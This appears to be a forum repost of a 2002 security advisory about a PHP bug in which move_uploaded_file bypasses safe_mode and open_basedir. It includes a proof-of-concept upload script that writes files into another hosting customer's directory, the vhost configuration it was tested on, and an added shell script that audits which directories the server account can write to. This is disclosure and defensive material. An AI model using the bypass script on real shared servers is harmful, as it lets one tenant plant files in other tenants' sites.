grayangel
New bug in PHP :-(
Hi everyone!
----------------------------------------------------------------------------------
From: Tozz <[email protected]>
Date: March 20, 2002
Subject: move_uploaded_file breaks safe_mode restrictions in PHP
--------------------------------------------------------------------------------
Hey
It's possible to circumvent (probably spelled wrong) PHP safe_mode
restrictions by using move_uploaded_file.
You take this nasty script (and you have domain whatever.com and your
directory path is
/domains/whatever.com/ )
<?
// Fields of the uploaded file as PHP exposes them for the form field 'file'
$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];
$size_limit = "100000"; // set size limit in bytes
if ($file) {
    if ($size < $size_limit) {
        // Destination is in another customer's tree, outside this vhost's open_basedir
        move_uploaded_file($temp,
            "/domains/somebodyelse.org/public_html/www/test/".$file);
        echo "The file <tt>$file</tt> was successfully uploaded";
    } else {
        echo "Sorry, your file exceeds the size limit of $size_limit bytes";
    }
}
echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>
As you can see, he moved the uploaded file to:
"/domains/somebodyelse.org/public_html/www/test/" while the user is
restricted with both safe_mode and open_basedir.
Virtualhost configuration snippet:
<VirtualHost IP_HERE>
    DocumentRoot /domains/whatever.com/public_html/root/
    ServerName root.whatever.com
    CustomLog /domains/whatever.com/logs/access_log combined
    ErrorLog /domains/whatever.com/logs/error_log
    php_admin_value safe_mode 1
    php_admin_value open_basedir /domains/whatever.com/public_html/root/
</VirtualHost>
As you can see I have both set safe_mode and the open_basedir
restriction but this user is able to upload any file where the apache
user has write access.
PHP.net is notified, and the bug has been fixed in CVS. However, I am unable
to compile the CVS version atm. Gives a lot of 'make' errors. Thanks go out
to bastijs for pointing this out to me.
Bye,
Tozz
------------------------------------------------------------------------------
Source: http://www.security.nnov.ru/search/document.asp?docid=2654
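
The advisory puts the exposure at "any file where the apache user has write access", so a hosting admin can measure it per virtual host. The script below is an added example, not part of the quoted message or of PHP: the function name writable_outside_base is hypothetical, it assumes the /domains/<site>/ layout used in the message, and it has to be run as the account the web server runs as.

```shell
#!/bin/sh
# Added example, not from the advisory. Run as the web server account so that
# "writable" means what it means for an upload handled by that server.

# writable_outside_base ROOT BASE   (hypothetical helper)
# Prints every directory under ROOT that the invoking user can write to and
# that is neither BASE nor below it. BASE is the vhost's open_basedir value.
# Both arguments should be canonical paths; symlinks are not followed.
writable_outside_base() {
    root=$1
    base=${2%/}                       # compare without the trailing slash
    find "$root" -type d 2>/dev/null | while IFS= read -r dir; do
        [ -w "$dir" ] || continue     # not writable for this user: no exposure
        case "$dir/" in
            "$base"/*) ;;             # inside the tenant's own base: expected
            *) printf '%s\n' "$dir" ;;
        esac
    done
}

# Stand-alone use:  sh audit.sh /domains /domains/whatever.com/public_html/root/
if [ "$#" -eq 2 ]; then
    writable_outside_base "$1" "$2"
fi
```

Every path it prints is a place where the upload in the message would have landed despite the open_basedir setting; removing the server account's write permission there closes that path independently of the PHP fix.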